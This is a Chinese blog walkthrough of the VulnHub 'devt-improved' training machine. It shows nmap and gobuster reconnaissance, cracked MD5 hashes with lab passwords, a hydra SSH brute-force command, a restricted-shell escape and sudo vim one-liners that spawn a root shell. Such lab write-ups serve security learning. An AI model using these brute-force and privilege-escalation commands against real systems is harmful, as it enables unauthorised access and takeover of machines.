devt-improved 打靶渗透

于 2024-08-08 18:44:38 发布
阅读量359 收藏 6
点赞数 12
文章标签: 网络 linux web安全 网络安全 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65112983/article/details/141030811
版权

一、信息收集

1、查看靶机的MAC地址:

2、查看靶机的ip地址:

nmap 192.168.13.0/24

3、查看靶机开放的端口:

nmap -p- -sC -sT -sV -A 192.168.13.160

4、访问靶机的8080端口:

5、页面中发现有一个目录html_pages,拼接访问一下:

6、依次拼接查看,发现只有downloads.html有点用,在源代码处有一个流量包下载地址:

7、下载流量包,并使用wireshark打开,查看流量包内容,中间发现了许多登录框:

8、发现这个页面有Patrick的密码逻辑:

9、进行目录爆破:

gobuster dir -u http://192.168.13.160:8080/developmentsecretpage/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,js,txt,html

10、在version.txt文件中发现了两个文件slog_users.txt 和 slog_users.php:

11、在txt文件中发现了许多账号和密码:

12、使用MD5进行解密,解密结果如下,admin的密码没有解密出来:

admin, 3cb1d13bb83ffff2defe8d1443d3a0eb---------没有解出来
intern, 4a8a2b374f463b7aedbb44a066363b81--------12345678900987654321
patrick, 87e6d56ce79af90dbe07d387d3d0579e-------P@ssw0rd25
qiu, ee64497098d0926d198f54f6d5431f98-----------qiu

13、使用上面的账号和密码制作字典,使用hydra进行爆破ssh账号和密码:

hydra -L /home/kali/username.txt -P /home/kali/pass.txt ssh://192.168.13.160

账号密码是:intern 和12345678900987654321

14、使用账号密码进行ssh连接:

15、发现执行命令,什么命令也没法执行,用户权限有限:

二、提权

1、使用命令获得正常交互式shell:

echo os.system('/bin/bash')

2、输入sudo -l查看是否有sudo权限,发现没有权限:

3、查看/etc/passwd文件,查看是否有其它用户,发现有patrick用户:

4、尝试使用密码切换这个用户:

5、查看是否有sudo权限:

sudo -l

6、发现这个用户有sudo权限,使用命令进行提权:

sudo vim -c ':!/bin/sh'

sudo vim -c ':py import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'

sudo vim -c ':lua os.execute("reset; exec sh")'

搬砖小星
关注
  • 12
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
OSCP-Vulnhub靶机记录-Development-walkthrough
深入交流学习:webMsec
09-30 463
提示我们有隐藏页面html_pages、有IDS(难怪刚才目录都没扫出来)cd /etc/passwd 发现patrick可运行 /bin/bash。echo os.system(‘/bin/bash’)获得shell。前面看到22端口,尝试ssh登陆,只有intern登录成功。得到靶机ip 192.168.52.137。用之前的密码切换为patrick用户。敏感信息泄露,拼接目录试一下。明显是MD5,解密走一波。尝试vim SUID提权。
volunteer-portal:DigiVol(生物多样性志愿者门户)
04-07
open http://devt.ala.org.au:8080/ 要运行DigiVol的无所事事实例,您可以使用存储库中的志愿手册。 这将从ALA Maven存储库中部署预编译的版本。 注意:必须先安装“ 和“ 。 然后设置虚拟机并运行剧本: git ...
OSCP - vulnhub devt-improved 靶机测试
m0_55751267的博客
11-15 148
那就先翻翻目录 到了home文件夹下发现有 patrick 用户,刚好我们有密码可以试一下行不行,结果可以切换到用户 patrick。好像也没什么东西 那就只有去ssh试试了 当时报问题我没有理解对 后面才发现生成了key就好了。解出来如下(上面两个是在之前翻网站时看到的人名就记录了下来了)admin的没有解开。就开了同系列的另一台主机 期间遇到了一个小问题看了下wp 结果是本机的问题。期间发现了很多这种类似的登陆页面和这些主页 最后发现其实没有什么用处。到此就完成了,难度个人感觉适合初学者入门。
[Vulnhub] devt-improved slog_users+vim权限提升+nano权限提升+passwd权限提升+Lxc逃逸权限提升
07-16 433
#slog_users #vim权限提升 #nano权限提升 #passwd权限提升 #Lxc逃逸权限提升
下载vue.js devt-tool失败,解决方案
qq_40871196的博客
07-11 1040
最近在学习Vue,为了便于开发,于是在chrome浏览器上安装vue-devtools,Vue.js devtools是基于google chrome浏览器的一款调试vue.js应用的开发者浏览器扩展,可以在浏览器开发者工具下调试代码。按照网上最常见的方法。 第一步:首先在github下载devtools源码,地址:https://github.com/vuejs/vue-devtools 第二步:将下载下来的压缩包解压到本地(路径最好为全英文) 第三步:打开命令行,cd到解压后...
Vulnhub Development靶场 Walkthrough
RichardLuo
04-09 200
Vulnhub Development靶场Walkthrough
VulnHub-digitalworld.local: DEVELOPMENT渗透学习
我是小小白的博客
07-16 385
前言 靶机地址:https://download.vulnhub.com/digitalworld/devt-improved.7z 靶机难度:中级(CTF) 靶机发布日期:2018 年 12 月 28 日 靶机描述:这台机器让我们想起了一个开发环境:错误配置占据了主导地位。这是专为OSCP练习而设计的,机器的原始版本用于CTF。它现在复活了,并且比原来的更加邪恶。 如果你必须有关于这台机器的提示(即使他们可能不会对你有很大帮助,除非你在你的机器上扎根!):开发是(#1):与生产不同,(#2):一
Linux DMA-Buf驱动框架
杀手的博客
06-15 1023
dmabuf 是一个驱动间共享buf 的机制,他的简单使用场景如下:用户从DRM(显示驱动)申请一个dmabuf,把dmabuf 设置给GPU驱动,并启动GPU将数据输出到dmabuf,GPU输出完成后,再将dmabuf设置到DRM 驱动,完成画面的显示。在这个过程中通过共享dmabuf的方式,避免了GPU输出数据拷贝到drm frame buff的动作。
TX-LCN客户端异常
tianlong1569的专栏
06-25 1238
最近在部署TX-LCN时出现如下异常: 18:35:55.423 [main] DEBUG org.springframework.boot.devtools.settings.DevToolsSettings - Included patterns for restart : [] 18:35:55.425 [main] DEBUG org.springframework.boot.devt...
linux mdev -s没有运行,mdev详解
weixin_39947908的博客
05-12 475
一、概述mdev是busybox提供的一个工具,用在嵌入式系统中,相当于简化版的udev,作用是在系统启动和热插拔或动态加载驱动程序时,自动创建设备节点。文件系统中的/dev目录下的设备节点都是由mdev创建的。在加载驱动过程中,根据驱动程序,在/dev下自动创建设备节点。以下内容摘自busybox-1.23.1的mdev.txt文件:Mdev has two primary uses: init...
Mobile DevTools-crx插件
04-01
语言:English 一个移动浏览器扩展,用于使用控制台,DOM,网络信息,源等调试网站和应用程序。 用于调试Web应用程序的移动浏览器扩展。 基于开放源代码项目Eruda,Mobile ...根据页面内容的安全策略,Mobile DevT
libncurses5-dev安装包
07-01
libncurses5-dev安装包,从官方网站下载的。使用前需先安装G++。看看大家有没有用到的。需要的自己下载。
CuratedCart:一个简单的电子商务购物应用程序@ http
05-09
策划车 :shopping_bags: 购物应用-Reactjs + Redux + Firebase 直播: : 一个内置在React,Redux,Firebase和Stripe中的简单电子商务购物应用程序 ...集成了全Responsive N Material UI ...React-devt
基于ESP32S的3D打印机主板电路设计方案(原理图)-电路方案
04-20
是基于esp32的3D打印主板。 ... 1. ESP-Helios打印机控制板有五个驱动程序, 其中两个用于双Z控制。 2. ESP-Helios可以根据需要选择不同的驱动程序。 3.主板上仅保留一个OLED屏幕接口(ICC接口)和一个编码器接口, ...
J031_使用TCP协议支持与多个客户端同时通信
lzn20161229的博客
08-03 452
使用TCP协议支持与多个客户端同时通信。
如何计算UDP校验和
最新发布
ZhongUncle的博客
08-07 639
在了解 UDP 校验和的时候,发现资料很少,如果看教材的话,一定看到过下面这两张图,但是又看不懂,加上解释之后也难懂:本文先说具体怎么算的,再说一些细节,过程中顺带解释一下这两个图(第一张图是布局情况,第二张图是解释如何计算的)。
【Vulnhub系列】Vulnhub Connect-The-Dots 靶场渗透(原创)
Lusen的博客
08-02 603
Vulnhub系列Connect-The-Dots靶场做题记录
如何提前预防网络威胁
dexun123的博客
08-06 634
这场攻击规模空前,据官方数据,受影响的服务器数量飙升至3800余台,波及范围广泛,尤以美、加、法、德等国的企业为重灾区。态势感知,作为一种根植于环境、动态且全局性的安全风险洞察能力,其核心在于运用安全大数据的浩瀚资源,从宏观视角深化对安全威胁的发现、理解、分析及响应能力,最终引领至精准的安全决策与行动。态势感知强调对网络安全态势的全方位、实时、动态监控与评估,旨在于攻击链条的每一个细微环节捕捉异常,无论是情报搜集的微妙动作,还是攻击尝试的初步试探,乃至数据窃取与情报回传的隐蔽行动,都难逃其敏锐的“法眼”。
device_create函数
07-27
device_create函数是Linux内核提供的一个函数,用于在设备模型中创建一个设备对象。这个函数的原型定义如下: ```c struct device *device_create(struct class *class, struct device *parent, dev_t devt, void *drvdata, const char *fmt, ...) ``` 参数说明: - `class`:指向设备类的指针,表示将要创建的设备所属的类。 - `parent`:指向父设备对象的指针,表示将要创建的设备的父设备。 - `devt`:设备号,用于标识设备。 - `drvdata`:指向设备驱动私有数据的指针。 - `fmt`:设备名称的格式化字符串,用于生成设备名称。 这个函数会在设备模型中创建一个新的设备对象,并将其添加到指定的设备类中。设备对象包含了设备的相关信息,如名称、类型等。这个函数还会为设备对象分配一个设备号,并将其与设备对象关联起来。 注意,该函数在内部会调用device_add函数来向系统注册设备,并在成功创建设备后返回指向新创建设备对象的指针。在不再需要使用该设备时,可以使用device_destroy函数来销毁设备对象。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值